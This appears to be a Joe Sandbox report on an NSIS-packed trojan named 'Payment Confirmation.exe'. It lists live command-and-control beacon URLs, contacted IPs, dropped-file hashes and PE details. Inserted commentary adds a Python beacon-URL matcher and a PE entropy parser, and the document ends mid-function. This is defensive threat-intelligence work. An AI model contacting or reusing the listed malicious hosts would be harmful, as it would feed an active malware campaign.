          http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== | true | Avira URL Cloud: safe | unknown
          http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz | true | Avira URL Cloud: safe | unknown
          http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz | true | Avira URL Cloud: safe | unknown
          http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== | true | Avira URL Cloud: safe | unknown
          http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== | false | Avira URL Cloud: safe | unknown
          http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== | true | Avira URL Cloud: safe | unknown
          http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz | false | Avira URL Cloud: safe | unknown
          http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz | true | Avira URL Cloud: safe | unknown
          www.thesewhitevvalls.com/b2c0/ | true | Avira URL Cloud: safe | low
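All nine GET URLs share one shape: a single short path segment (/b2c0/) followed by exactly two query parameters, a short token that is identical across every host here (nZR4=4hr8Pfz) and a 76-character base64-looking blob under EN9pK2, with the two appearing in either order; the tenth entry is the same path on www.thesewhitevvalls.com with no query. The matcher below is an added example derived from these URLs, not the sandbox's own detection; it accepts the report's URLs and rejects the benign ones from the memory strings further down. The path length range (3 to 5 characters) and the parameter length thresholds are assumptions generalised from the single campaign tag seen here, so treat a path-only hit as weak unless the host has also been seen with a full beacon.

```python
"""Match URLs against the beacon shape shown by the GET URLs in this report.

Added example derived from the report's URLs; it is not the sandbox's own
detection. Assumptions: the path is a single short alphanumeric segment
(b2c0 here; 3-5 characters accepted), and the query carries exactly two
parameters, one short token and one base64-looking blob of 40+ characters."""
from __future__ import annotations
import re
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/([a-z0-9]{3,5})/$", re.IGNORECASE)
SHORT_RE = re.compile(r"^[A-Za-z0-9]{5,10}$")
LONG_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def _raw_params(query: str) -> list[tuple[str, str]]:
    """Split the query without decoding: '+' and '/' are payload characters,
    which urllib.parse.parse_qs would turn into spaces or unquote."""
    if not query:
        return []
    return [(k, v) for k, _, v in (p.partition("=") for p in query.split("&"))]


def classify(url: str) -> dict | None:
    """Describe the beacon, or return None for a URL that does not fit."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    m = PATH_RE.match(parts.path)
    if not m:
        return None
    info = {"host": parts.hostname, "path_id": m.group(1)}
    params = _raw_params(parts.query)
    if not params:
        # Path with no query: weak on its own (any short directory fits),
        # meaningful only on a host already seen with a full beacon.
        info["kind"] = "path-only"
        return info
    if len(params) != 2:
        return None
    short = [kv for kv in params if SHORT_RE.match(kv[1])]
    blob = [kv for kv in params if LONG_RE.match(kv[1])]
    if len(short) != 1 or len(blob) != 1:
        return None
    info.update(kind="get-beacon", token=short[0],
                payload_key=blob[0][0], payload_len=len(blob[0][1]))
    return info


def hosts_by_kind(urls: list[str]) -> dict[str, set[str]]:
    """host -> kinds seen, so path-only hits can be weighed against full beacons."""
    out = {}
    for u in urls:
        info = classify(u)
        if info:
            out.setdefault(info["host"], set()).add(info["kind"])
    return out


# The URLs listed in this report (Contacted URLs).
REPORT_GET_URLS = [
    "http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw==",
    "http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ==",
    "http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz",
    "http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz",
    "http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==",
    "http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA==",
    "http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ==",
    "http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz",
    "http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz",
]
REPORT_PATH_ONLY = "www.thesewhitevvalls.com/b2c0/"

if __name__ == "__main__":
    for u in REPORT_GET_URLS + [REPORT_PATH_ONLY]:
        print(classify(u))
    print(hosts_by_kind(REPORT_GET_URLS + [REPORT_PATH_ONLY]))
```

The query is split by hand rather than with parse_qs because the blob contains raw '+' and '/' characters that a form decoder would rewrite, which would both corrupt the value and break the length check.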

                                        URLs from Memory and Binaries

          Name | Source | Malicious | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp | false | high
          http://nsis.sf.net/NSIS_Error | Payment Confirmation.exe | false | high
          http://www.litespeedtech.com/error-page | msiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmp | false | high
          http://nsis.sf.net/NSIS_ErrorError | Payment Confirmation.exe | false | high

          No antivirus detection was recorded for these strings. The nsis.sf.net strings, the NSIS-style entry point listed above (SetErrorMode, GetVersion, OleInitialize, SHGetFileInfoA, GetTempPathA, ...) and the nsp1E48.tmp plugin directory of the dropped DLL mark the outer layer as an NSIS installer. The LiteSpeed error-page string in msiexec.exe memory is the default error page of that web server, most likely the body of an HTTP error response from one of the contacted hosts rather than something the sample carries.

                                                Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          52.206.159.80 | propage.beatstars.com | United States | 14618 | AMAZON-AESUS | false
          45.91.80.182 | chinaopedia.com | United Kingdom | 209484 | ASIANETGB | true
          172.105.103.207 | www.thesewhitevvalls.com | United States | 63949 | LINODE-APLinodeLLCUS | true
          62.210.5.81 | www.atp-cayenne.com | France | 12876 | OnlineSASFR | true
          34.102.136.180 | playstarexch.com | United States | 15169 | GOOGLEUS | false
          94.73.147.156 | anadolu.academy | Turkey | 34619 | CIZGITR | true
          82.98.134.154 | www.unasolucioendesa.com | Spain | 42612 | DINAHOSTING-ASES | true
          3.223.115.185 | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:502129
                                                Start date:13.10.2021
                                                Start time:16:30:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 56s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Payment Confirmation.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                 Number of new started processes analysed:24
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@11/8
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 26.6% (good quality ratio 23.5%)
                                                • Quality average: 74.2%
                                                • Quality standard deviation: 33.2%
                                                HCA Information:
                                                • Successful, ratio: 78%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 95.100.216.89
                                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

Match | Associated Sample Name / URL | Detection | Context
52.206.159.80 | 2WK7SGkGVZ.exe | malicious | www.lumberjackguitarloops.com/b2c0/?7nlpd=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&5jlp=4halC6h
52.206.159.80 | jnnbbMX9Ch.exe | malicious | www.lumberjackguitarloops.com/b2c0/?3f=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&BZe=kp3h4dC8BXM0A010
52.206.159.80 | vbc.exe | malicious | www.lumberjackguitarloops.com/b2c0/?yFN4sV7X=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&y48t=zbm4GzHpaJR
52.206.159.80 | DUE PAYMENT.exe | malicious | www.lumberjackguitarloops.com/b2c0/?2dpPwJP=Evx8EsBDD995ptjzx7gJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDwZ5ennVPQW&YVeD=TX_h
52.206.159.80 | 678901.exe | malicious | www.lumberjackguitarloops.com/b2c0/?T0DTobah=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==&XXut=DtHTzXpHJvwTW
52.206.159.80 | SOA.exe | malicious | www.lumberjackguitarloops.com/b2c0/?3ff=y6AT2b&m4C=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJAwG6aDcVM1S
52.206.159.80 | Details for bookings.exe | malicious | www.superbbsuper.com/t052/?ndndnH=UtWlrPo0yz28&AjR=dnoQ9Fq0Tjgk912J2nPmmxMg6AfDnqRukncs3air9eV/cbfskXhsbeNgpyNtUTPj9Sxb
45.91.80.182 | jnnbbMX9Ch.exe | malicious | www.chinaopedia.com/b2c0/?3f=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&pRvL1=_T_XyD6
45.91.80.182 | vbc.exe | malicious | www.chinaopedia.com/b2c0/?yFN4sV7X=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&9redQX=Kxl0dTlPOf
45.91.80.182 | CpUNO6WMEm.exe | malicious | www.chinaopedia.com/b2c0/?m48dC6Y=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&Zj=DBZlR
45.91.80.182 | DUE PAYMENT.exe | malicious | www.chinaopedia.com/b2c0/?2dpPwJP=qdiIlJawxdwAaLin48sa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYcW7pTjsxcMH&uN9=3fPH4rk8fd4xHD

                                                Domains

Match | Associated Sample Name / URL | Detection | Context
propage.beatstars.com | 2WK7SGkGVZ.exe | malicious | 52.206.159.80
propage.beatstars.com | jnnbbMX9Ch.exe | malicious | 52.206.159.80
propage.beatstars.com | vbc.exe | malicious | 52.206.159.80
propage.beatstars.com | DUE PAYMENT.exe | malicious | 52.206.159.80
propage.beatstars.com | 678901.exe | malicious | 52.206.159.80
propage.beatstars.com | SOA.exe | malicious | 52.206.159.80
propage.beatstars.com | Details for bookings.exe | malicious | 52.206.159.80
propage.beatstars.com | EME_PO.47563.xlsx | malicious | 52.206.159.80
www.thesewhitevvalls.com | pKD3j672HL.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | DEUXRWq2W8.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | 09090.xlsx | malicious | 172.105.103.207
www.thesewhitevvalls.com | 82051082.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | 8205108.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | 2WK7SGkGVZ.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | jnnbbMX9Ch.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | vbc.exe | malicious | 172.105.103.207
www.thesewhitevvalls.com | CpUNO6WMEm.exe | malicious | 50.17.5.224

                                                ASN

Match | Associated Sample Name / URL | Detection | Context
ASIANET (GB) | jnnbbMX9Ch.exe | malicious | 45.91.80.182
ASIANET (GB) | vbc.exe | malicious | 45.91.80.182
ASIANET (GB) | CpUNO6WMEm.exe | malicious | 45.91.80.182
ASIANET (GB) | DUE PAYMENT.exe | malicious | 45.91.80.182
ASIANET (GB) | sprogr.exe | malicious | 155.235.98.69
ASIANET (GB) | dmtkgN4tPg.exe | malicious | 91.216.190.111
ASIANET (GB) | googlechrome_3843.exe | malicious | 155.235.80.79
ASIANET (GB) | SecuriteInfo.com.Trojan.DnsChange.10846.3052.exe | malicious | 23.236.69.114
AMAZON-AES (US) | Payment Information MT103.exe | malicious | 18.215.13.95
AMAZON-AES (US) | qalTySElfj | malicious | 34.226.20.105
AMAZON-AES (US) | rLGunciziY | malicious | 54.196.47.175
AMAZON-AES (US) | JuufQURFPh.exe | malicious | 50.16.216.118
AMAZON-AES (US) | ut5yFyWEDd | malicious | 44.222.19.141
AMAZON-AES (US) | jew.x86 | malicious | 54.167.221.252
AMAZON-AES (US) | ckYh27IjHJ | malicious | 34.236.224.188
AMAZON-AES (US) | TM2ALMOZ8Q | malicious | 18.205.154.215
AMAZON-AES (US) | cM5cZsOugg | malicious | 54.138.164.249
AMAZON-AES (US) | jew.x86 | malicious | 35.172.163.150
AMAZON-AES (US) | DHL-Waybill.exe | malicious | 54.208.212.1
AMAZON-AES (US) | UaBxIF11A6 | malicious | 54.82.231.227
AMAZON-AES (US) | 80wVQ9c87m | malicious | 34.238.201.118
AMAZON-AES (US) | ubr43ro8gn | malicious | 52.3.190.129
AMAZON-AES (US) | DQak2G9Ly5 | malicious | 44.196.235.84
AMAZON-AES (US) | x86 | malicious | 54.53.174.239
AMAZON-AES (US) | sora.x86 | malicious | 44.192.229.159
AMAZON-AES (US) | xd.arm | malicious | 52.0.161.15
AMAZON-AES (US) | R0987653400008789.exe | malicious | 50.17.226.156
AMAZON-AES (US) | pKD3j672HL.exe | malicious | 23.21.157.88

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\jkajud1yvpgnu8q
Process: C:\Users\user\Desktop\Payment Confirmation.exe
File Type: data
Category: dropped
Size (bytes): 219451
Entropy (8bit): 7.993041781240184
Encrypted: true
SSDEEP: 6144:6YaKKKKKKKKKKKKKQytJ7SVtrHTKld2xozO6:vJWLrHAIuzO6
MD5: D1F72710AC133640BEEE60FCF6237F37
SHA1: E5153D750F3C97EA0227BFE83BE3B6E98F4A1B50
SHA-256: B8C3F629761EF0C1FADBE9111356C7F82947BE6CECD42F2C5238E0A6101D0A1A
SHA-512: 504151BF950F495BD031ADAE6887A3D09E5DC3C9E993541B92422A76230E38593B6A00705A7E3CD07066A05409A98366CFE98118D7C97102E90E5D58D9594388
Malicious: false
Reputation: low
                                                Preview: ..3.0..9..q(....X..Ad.`..2.......^~........{.g...H1\.Uny...?...:AdD...e..f...{[...qQcC......Q.2MZ_...UT$Ir.......(_.."'..&.1..L$.}..^.6.B...` '.L..*....+.......M.B..cn?..O.m.E.X....2.._kTq.......4.0..7$....?%.0B.... U..3c'.u...G.}<Cu.."_..a.S.}..8....9.|.......Q..z.".;..kF.....^~.......<.{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n........]F.m.X...Wm2.=q.T......,.....k7n..w.?%.0B.....U..3c'y6.....}.Cu.e"_..a.S.}......9.<...m...Q..O...;..k......^~........{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n.....n?..O.m.._X.0m2._!.Tq.....,.....k7$....?%.0B.....U..3c'y6.....}.Cu.e"_..a.S.}......9.<...m...Q..O...;..k......^~........{.g...H1\.Uny.V.?.R..A.(W.).......;n\........?A..q$..$.Ar<..g....v...!2RP..."'..&/.\*:.....i$....\.N...1$.....H.GJ./d.|..n.....n?..O.m.._X.0m2._!.Tq.....,.....k7$....?%.0B.....U..3c
                                                C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll
Process: C:\Users\user\Desktop\Payment Confirmation.exe
File Type: PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 107008
Entropy (8bit): 6.3935752740603675
Encrypted: false
SSDEEP: 1536:XlGfGAPqPOicsu0WpmS89PdDeSGTzIfTw83qVlIHyaaEil3Wkly9ncobUfs+ulZ6:1GfGAIOqXSKS13nKixlyrquv
MD5: D4233FEFC9328CC30B0EF014BEB2F51B
SHA1: 302180A5EDB1FD653D7884BB60172E6EDFBBEAC4
SHA-256: 1827A3002964434B0ACFF1359241948E334148D3413312CFEA326CAE8F269758
SHA-512: B3E19C83E631B6A8B8B0D00AB14AF811519765B737F1497F27E8C3A8C3328038967DBB6095671E4095AF48D6355B5F13CEC20C38EF2DFB14CC2AE8E9482DE4AF
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation: low
                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....{fa...........!....."...|.......*..............................................................................<...J...........................................................................h]..H...............|............................text...A .......".................. ..`.rdata...R...@...T...&..............@..@.data....C.......&...z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.4809595381543454
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Payment Confirmation.exe
File size: 455901
MD5: 98ffc3c812e6cec919ebd286973e2002
SHA1: b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256: 014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
SHA512: 5875f8f2c736cbf501c25635f5c9014e499a7fce01f139315cbf5c0d3c45e1e8568a9fa8ddfe60cb0a44804a7677fdcd411eab4be6177926649b1b691d97a721
SSDEEP: 6144:hBlL/NDevWMKIPT48zhmgL58KCjuLkTMm6GBX3KTDDC3cz/3aKkm3HC:n6B8KC4kTrV3KlziKkR
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                File Icon

Icon Hash: d2e2ececd2e4b8c0

                                                Static PE Info

                                                General

Entrypoint: 0x4030fb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FE7208FACF3h
                                                push ebx
                                                call 00007FE7208FDAD4h
                                                cmp eax, ebx
                                                je 00007FE7208FACE9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FE7208FDA50h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FE7208FACCDh
                                                push 0000000Dh
                                                call 00007FE7208FDAA8h
                                                push 0000000Bh
                                                call 00007FE7208FDAA1h
                                                mov dword ptr [00423F44h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
                                                mov dword ptr [00423FF8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F4F0h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 00423740h
                                                call 00007FE7208FD6D4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 0042A000h
                                                push eax
                                                push ebp
                                                call 00007FE7208FD6C2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x28068 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.665123980978 | data | 6.42230569414 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.20291736659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b038 | 0x600 | False | 0.432291666667 | data | 4.0475118296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2d000 | 0x28068 | 0x28200 | False | 0.26199255257 | data | 5.8434826371 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
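
The per-section entropy in the table above, and the "Encrypted: true" flag that the Created / dropped Files section puts on the 219451-byte drop with entropy 7.99, both rest on the same 8-bit Shannon entropy measurement. As an added example that is not part of the Joe Sandbox report, the following Python parses a PE section table with only the standard library and reports entropy and a packed/encrypted verdict per section. The 7.9 verdict threshold and the toy PE32 the block builds for itself (one low-entropy section, one filled from a seeded PRNG) are this example's own assumptions, not data from the analysed sample.

```python
import math
import random
import struct
from typing import Dict, List, Tuple

# Verdict threshold (this example's own choice, not a Joe Sandbox constant):
# 8-bit entropy this close to the 8.0 maximum means compressed or encrypted
# bytes, which is what an "Encrypted: true" flag on a 7.99-entropy drop reflects.
PACKED_ENTROPY_THRESHOLD = 7.9

Section = Tuple[str, int, int, int, int, int]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input, 8.0 maximum."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(data: bytes) -> List[Section]:
    """Parse the section table of a PE image from its raw file bytes.

    Returns (name, virtual_address, virtual_size, raw_size, raw_pointer,
    characteristics) per section.  The optional header is skipped via
    SizeOfOptionalHeader, so PE32 and PE32+ are handled alike.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    sections: List[Section] = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes; VirtualSize precedes VirtualAddress.
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + i * 40)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         vaddr, vsize, raw_size, raw_ptr, chars))
    return sections


def section_report(data: bytes) -> List[Dict[str, object]]:
    """Per-section entropy with a packed/encrypted verdict, like the Sections table."""
    rows = []
    for name, vaddr, vsize, raw_size, raw_ptr, _chars in pe_sections(data):
        body = data[raw_ptr:raw_ptr + raw_size]   # empty for .ndata-style sections (raw size 0)
        ent = shannon_entropy(body)
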